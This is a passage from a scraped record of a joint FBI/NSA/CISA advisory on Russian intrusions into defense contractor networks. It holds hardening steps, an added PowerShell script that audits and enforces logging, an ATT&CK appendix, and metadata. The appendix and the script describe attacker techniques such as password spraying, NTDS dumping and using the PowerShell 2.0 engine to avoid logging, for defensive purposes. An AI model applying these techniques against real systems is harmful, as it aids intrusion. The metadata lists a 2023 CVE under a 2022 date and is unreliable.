 * **Enable multifactor authentication (MFA)** for all users, without exception. Subsequent authentication may not require MFA, enabling the possibility to bypass MFA by reusing single factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions will cause account re-validation of their MFA requirements.[[6](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf>)] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single factor authentication assertions.[[7](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>)]

##### **_Enforce Strong, Unique Passwords_**

 * **Require accounts to have strong, unique passwords.** Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
 * **Enable password management functions**, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.

##### **_Introduce Account Lockout and Time-Based Access Features_**

 * **Implement time-out and lock-out features** in response to repeated failed login attempts.
 * **Configure time-based access for accounts set at the admin level and higher.** For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.

##### **_Reduce Credential Exposure_**

 * **Use virtualization solutions on modern hardware and software** to ensure credentials are securely stored, and protect credentials via capabilities such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[[8](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage%20Modern%20Hardware%20Security%20Features%20-%20Copy.pdf>)] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[[9](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>)][[10](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>)] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). Installation of Windows 11 requires TPM v2.0.[[11](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>)] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[[12](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>)][[13](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>)]

#### **Establish Centralized Log Management**

 * **Create a centralized log management system.** Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment.
 * Forward all logs to a SIEM tool.
 * Ensure logs are searchable.
 * Retain critical and historic network activity logs for a minimum of 180 days.
 * **If using M365, enable Unified Audit Log (UAL)**, M365’s logging capability, which contains events from Exchange Online, SharePoint Online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services.
 * **Correlate logs, including M365 logs, from network and host security devices.** This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365.

In addition to setting up centralized logging, organizations should:

 * **Ensure PowerShell logging is turned on.** Threat actors often use PowerShell to hide their malicious activities.[14]
 * **Update PowerShell instances to version 5.0 or later** and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities.
 * **Confirm PowerShell 5.0 instances have module, script block, and transcription logging** enabled.
 * **Monitor remote access/Remote Desktop Protocol (RDP) logs** and disable unused remote access/RDP ports.

#### **Initiate a Software and Patch Management Program**

 * **Consider using a centralized patch management system.** Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise.
Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[[15](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf>)] \n * If an organization is unable to update all software shortly after a patch is released, **prioritize patches for CVEs that are already known **to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). \n * **Subscribe to [CISA cybersecurity notifications and advisories](<https://us-cert.cisa.gov/ncas>)** to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. \n * **Sign up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)**, including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.\n\n#### **Employ Antivirus Programs **\n\n * **Ensure that antivirus applications are installed on all organizations\u2019 computers** and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. \n * **Keep virus definitions up to date.**\n * **Regularly monitor antivirus scans.**\n\n#### **Use Endpoint Detection and Response Tools **\n\n * **Utilize endpoint detection and response (EDR) tools.** These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. 
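The following PowerShell is an added example, not code from the advisory or from the FBI, NSA, or CISA. It turns the "Establish Centralized Log Management" guidance above into something an administrator can run: it audits the three PowerShell logging features (module, script block, and transcription) by reading the Group Policy registry locations that Windows PowerShell 5.1 honours, enforces them when asked, and checks whether the PowerShell 2.0 engine, which ignores all of those settings, is still installed. The registry paths and the event IDs 4103 and 4104 (in the Microsoft-Windows-PowerShell/Operational channel) are Microsoft's documented ones; the transcript directory, the SIEM share name, and the use of local policy rather than a GPO are assumptions for illustration. The feature name used for the 2.0 engine is the DISM name on Windows 10/11 and current Windows Server; older Server releases expose it differently.

```powershell
# Added example (not from the advisory). Audit and enforce PowerShell logging per the
# mitigation above. Reading HKLM works unprivileged; Set-* and the feature check need an
# elevated Windows PowerShell 5.1 session. In a domain, push the same values via GPO
# (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell).

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Each logging feature, the DWORD that enables it (1 = on), and the event ID its output
# produces in Microsoft-Windows-PowerShell/Operational. Transcripts go to files, not events.
$Settings = @(
    @{ Name = 'ModuleLogging';      Key = "$PolicyRoot\ModuleLogging";      Value = 'EnableModuleLogging';      EventId = 4103 }
    @{ Name = 'ScriptBlockLogging'; Key = "$PolicyRoot\ScriptBlockLogging"; Value = 'EnableScriptBlockLogging'; EventId = 4104 }
    @{ Name = 'Transcription';      Key = "$PolicyRoot\Transcription";      Value = 'EnableTranscripting';      EventId = $null }
)

function Get-PowerShellLoggingPolicy {
    # One row per feature. Enabled is $true only when the policy DWORD is exactly 1;
    # a missing key or a 0 both mean the feature is off.
    foreach ($s in $Settings) {
        $current = (Get-ItemProperty -Path $s.Key -Name $s.Value -ErrorAction SilentlyContinue).($s.Value)
        [pscustomobject]@{
            Feature = $s.Name
            Enabled = ($current -eq 1)
            EventId = $s.EventId
        }
    }
}

function Set-PowerShellLoggingPolicy {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # Assumed placeholder. Use a central share that users can write to but not read,
        # and have the SIEM collector pull from it; local disk is only acceptable for a lab.
        [string]$TranscriptPath = 'C:\PSTranscripts'
    )
    foreach ($s in $Settings) {
        if ($PSCmdlet.ShouldProcess($s.Key, "Set $($s.Value) = 1")) {
            New-Item -Path $s.Key -Force | Out-Null
            Set-ItemProperty -Path $s.Key -Name $s.Value -Value 1 -Type DWord
        }
    }
    # Module logging only records modules listed under ModuleNames; '*' means all of them.
    $moduleNames = "$PolicyRoot\ModuleLogging\ModuleNames"
    if ($PSCmdlet.ShouldProcess($moduleNames, 'Log all modules (*)')) {
        New-Item -Path $moduleNames -Force | Out-Null
        Set-ItemProperty -Path $moduleNames -Name '*' -Value '*' -Type String
    }
    # Transcription: record the invocation header (timestamp and command) and set the directory.
    $transcription = "$PolicyRoot\Transcription"
    if ($PSCmdlet.ShouldProcess($transcription, "OutputDirectory = $TranscriptPath")) {
        New-Item -Path $transcription -Force | Out-Null
        Set-ItemProperty -Path $transcription -Name 'EnableInvocationHeader' -Value 1 -Type DWord
        Set-ItemProperty -Path $transcription -Name 'OutputDirectory' -Value $TranscriptPath -Type String
    }
}

function Test-PowerShellV2Engine {
    # The 2.0 engine predates module, script block and transcription logging, so launching it
    # is a common way to run PowerShell without leaving 4103/4104 events. On Windows 10/11 and
    # current Windows Server it is an optional feature (DISM name assumed here) and can be removed.
    $feature = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Feature   = 'PowerShellV2Engine'
        Installed = ($null -ne $feature -and $feature.State -eq 'Enabled')
        Remedy    = 'Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart'
    }
}

# Usage: audit first, then enforce. Keep -WhatIf on the first run to preview the registry writes.
Get-PowerShellLoggingPolicy | Format-Table -AutoSize
Test-PowerShellV2Engine | Format-List
# Set-PowerShellLoggingPolicy -TranscriptPath '\\siem-collector\transcripts$' -WhatIf
```

Run the audit on a sample of hosts before and after the GPO change and compare the `Enabled` column; a host that reports all three features on but still shows the 2.0 engine installed has a gap, since any script run under that engine produces none of the 4103/4104 events the SIEM is expecting. Transcripts are written per session to the configured directory, so that path must itself be forwarded by the log collector to count as centralized logging.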

#### **Maintain Rigorous Configuration Management Programs**

 * **Audit configuration management programs** to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[[16](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf>)]

#### **Enforce the Principle of Least Privilege**

 * **Apply the principle of least privilege.** Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised.
 * **For M365, assign administrator roles using role-based access control (RBAC)** to implement the principle of least privilege. Given its high level of default privilege, use the Global Administrator role only when absolutely necessary. Using Azure AD's numerous other built-in administrator roles instead of Global Administrator avoids assigning unnecessary privileges. _**Note:** refer to the Microsoft documentation, [Azure AD built-in roles](<https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles>), for more information about Azure AD._
 * **Remove privileges not expressly required by an account's function or role.**
 * **Ensure there are unique and distinct administrative accounts** for each set of administrative tasks.
 * **Create non-privileged accounts for privileged users,** and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
 * **Reduce the number of domain and enterprise administrator accounts,** and remove all accounts that are unnecessary.
 * **Regularly audit administrative user accounts.**
 * **Regularly audit logs to ensure new accounts are legitimate users.**
 * **Institute a group policy that disables remote interactive logins** for administrative accounts on systems where they are not needed, and add those accounts to the Active Directory Protected Users security group. Protected Users membership blocks NTLM authentication, weak Kerberos encryption types, credential delegation, and cached logons for its members, so pilot it on a small set of accounts before applying it broadly.

To assist with identifying suspicious behavior with administrative accounts:

 * **Create privileged role tracking.**
 * **Create a change control process** for all privilege escalations and role changes on user accounts.
 * **Enable alerts on privilege escalations and role changes.**
 * **Log privileged user changes** in the network environment, and create an alert for unusual events.

#### **Review Trust Relationships**

 * **Review existing trust relationships with IT service providers,** such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data.
 * **Remove unnecessary trust relationships.**
 * **Review contractual relationships** with all service providers, and ensure contracts include:
   * Security controls the customer deems appropriate.
   * Appropriate monitoring and logging of provider-managed customer systems.
   * Appropriate monitoring of the service provider's presence, activities, and connections to the customer network.
   * Notification of confirmed or suspected security events and incidents occurring on the provider's infrastructure and administrative networks.

_**Note:** review CISA's page on [APTs Targeting IT Service Provider Customers](<https://www.cisa.gov/uscert/APTs-Targeting-IT-Service-Provider-Customers>) and [CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for additional recommendations for MSP and CSP customers._

#### **Encourage Remote Work Environment Best Practices**

With the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices. _**Note:** for additional information, see the joint NSA-CISA Cybersecurity Information Sheet: [Selecting and Hardening Remote Access VPN Solutions](<https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>)._

 * **Regularly update VPNs, network infrastructure devices, and devices used for remote work environments** with the latest software patches and security configurations.
 * **When possible, require MFA on all VPN connections.** Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.
 * **Monitor network traffic for unapproved and unexpected protocols.**
 * **Reduce potential attack surfaces by discontinuing unused VPN servers** that may be used as a point of entry by adversaries.

#### **Establish User Awareness Best Practices**

Cyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:

 * **Provide end user awareness and training.** To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.
 * **Inform employees of the risks of social engineering attacks,** e.g., risks associated with posting detailed career information to social or professional networking sites.
 * **Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion** to help quickly and efficiently identify threats and employ mitigation strategies.

#### **Apply Additional Best Practice Mitigations**

 * **Deny atypical inbound activity from known anonymization services,** including commercial VPN services and The Onion Router (Tor).
 * **Impose allowlisting policies for applications and remote access** that only allow systems to execute known and permitted programs under an established security policy.
 * **Identify and create offline backups for critical assets.**
 * **Implement network segmentation.**
 * **Review CISA Alert [AA20-120A: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>)** for additional recommendations on hardening M365 cloud environments.

### Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State's Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to [rewardsforjustice.net](<https://rewardsforjustice.net/terrorist-rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>).

### Caveats

The information you have accessed or received is being provided "as is" for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA.

### Contact Information

To report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>) or the FBI's 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:cywatch@fbi.gov>).
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:central@cisa.gov>). For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). Defense Industrial Base companies may additionally sign up for NSA's free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).

### Appendix: Detailed Tactics, Techniques, and Procedures

#### **Reconnaissance** [[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]

Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials [[T1589.001](<https://attack.mitre.org/techniques/T1589/001>)].[[17](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1589.001 | Gather Victim Identity Information: Credentials | Adversaries may gather credentials that can be used during targeting.

#### **Initial Access** [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]

Initial Access consists of techniques that use various entry vectors to gain an initial foothold within a network. For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[18](<https://attack.mitre.org/groups/G0007>)] These specific actors obtained and abused credentials of domain [[T1078.002](<https://attack.mitre.org/techniques/T1078/002>)] and cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)].[[19](<https://attack.mitre.org/software/S0154/>)] The actors also used external remote services to gain access to systems [[T1133](<https://attack.mitre.org/techniques/T1133>)].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [[T1190](<https://attack.mitre.org/techniques/T1190>)].[[21](<https://attack.mitre.org/groups/G0007>)] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [[T1566.002](<https://attack.mitre.org/techniques/T1566/002>)].[22]

ID | Name | Description
---|---|---
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1078.002 | Valid Accounts: Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network.
T1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.
T1566.002 | Phishing: Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.

#### **Persistence** [[TA0003](<https://attack.mitre.org/tactics/TA0003>)]

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[23](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

#### **Privilege Escalation** [[TA0004](<https://attack.mitre.org/tactics/TA0004>)]

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[24](<https://attack.mitre.org/groups/G0007>)] Specifically in this case, credentials of cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)] were obtained and abused.[[25](<https://attack.mitre.org/software/S0154/>)]

ID | Name | Description
---|---|---
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

#### **Defense Evasion** [[TA0005](<https://attack.mitre.org/tactics/TA0005>)]

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating their contents on the system or in transit [[T1027](<https://attack.mitre.org/techniques/T1027>)].[[26](<https://attack.mitre.org/software/S0410/>)]

ID | Name | Description
---|---|---
T1027 | Obfuscated Files or Information | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

#### **Credential Access** [[TA0006](<https://attack.mitre.org/tactics/TA0006>)]

Credential Access consists of techniques for stealing credentials like account names and passwords. The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [[T1003.003](<https://attack.mitre.org/techniques/T1003/003>)].[[27](<https://attack.mitre.org/software/S0250/>)] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [[T1110.003](<https://attack.mitre.org/techniques/T1110/003>)].[[28](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1003.003 | OS Credential Dumping: NTDS | Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.
T1110.003 | Brute Force: Password Spraying | Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials.

#### **Discovery** [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [[T1083](<https://attack.mitre.org/techniques/T1083>)].[29] In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [[T1482](<https://attack.mitre.org/techniques/T1482>)].[30]

ID | Name | Description
---|---|---
T1083 | File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1482 | Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

#### **Collection** [[TA0009](<https://attack.mitre.org/tactics/TA0009>)]

Collection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [[T1213.002](<https://attack.mitre.org/techniques/T1213/002>)].[[31](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1213.002 | Data from Information Repositories: SharePoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information.

#### **Command and Control** [[TA0011](<https://attack.mitre.org/tactics/TA0011>)]

Command and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic. In this case, Tor and VPN servers were used as multi-hop proxies to route C2 traffic and obfuscate their activities [[T1090.003](<https://attack.mitre.org/techniques/T1090/003>)].[[32](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1090.003 | Proxy: Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies.

### Additional Resources

[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021.
[2] NSA Cybersecurity Advisory: [Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>), 7 October 2019.
[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021.
[4] Microsoft Article: [AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>), 29 July 2021.
[5] Microsoft GitHub: [New-KrbtgtKeys.ps1](<https://github.com/microsoft/New-KrbtgtKeys.ps1>), 14 May 2020.
[6] NSA Cybersecurity Information: [Defend Privileges and Accounts](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend%20Privileges%20and%20Accounts%20-%20Copy.pdf>), August 2019.
[7] Microsoft Article: [Group Managed Service Accounts Overview](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>), 29 July 2021.
\n[8] NSA Cybersecurity Information: [Leverage Modern Hardware Security Features](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage%20Modern%20Hardware%20Security%20Features%20-%20Copy.pdf>), August 2019. \n[9] Microsoft Article: [Protect derived domain credentials with Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>), 3 December 2021. \n[10] Microsoft Article: [Windows Defender Credential Guard protection limits](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>), 3 December 2021. \n[11] Microsoft Article: [Windows 11 requirements](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>), 30 November 2021. \n[12] Microsoft Blog Post: [The Importance of KB2871997 and KB2928120 for Credential Protection](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>), 20 September 2021. \n[13] Microsoft Article: [What\u2019s New in Credential Protection](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>), 7 January 2022. \n[14] NSA Cybersecurity Factsheet: [PowerShell: Security Risks and Defenses](<https://www.iad.gov/iad/library/ia-guidance/security-tips/powershell-security-risks-and-defenses.cfm>), 1 December 2016. \n[15] NSA Cybersecurity Information: [Update and Upgrade Software Immediately](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf>), August 2019. \n[16] NSA Cybersecurity Information: [Actively Manage Systems and Configurations](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively%20Manage%20Systems%20and%20Configurations.docx%20-%20Copy.pdf>), August 2019. 
\n[17] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[18] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[19] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[20] Based on technical information shared by Mandiant. \n[21] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[22] Based on technical information shared by Mandiant. \n[23] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[24] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[25] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[26] MITRE Software: [Fysbis](<https://attack.mitre.org/software/S0410/>), 6 November 2020. \n[27] MITRE Software: [Koadic](<https://attack.mitre.org/software/S0250/>), 30 March 2020. \n[28] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[29] Based on technical information shared by Mandiant. \n[30] Based on technical information shared by Mandiant. \n[31] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[32] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.\n\n### Revisions\n\nFebruary 16, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T12:00:00", "type": "ics", "title": "Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. 
Defense Information and Technology", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144", "CVE-2023-26360"], "modified": "2022-02-16T12:00:00", "id": "AA22-047A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T12:50:04", "description": "#### Actions to take today to mitigate cyber threats from ransomware:\n\n 1. Prioritize remediating known exploited vulnerabilities.\n 2. Train users to recognize and report phishing attempts.\n 3. 
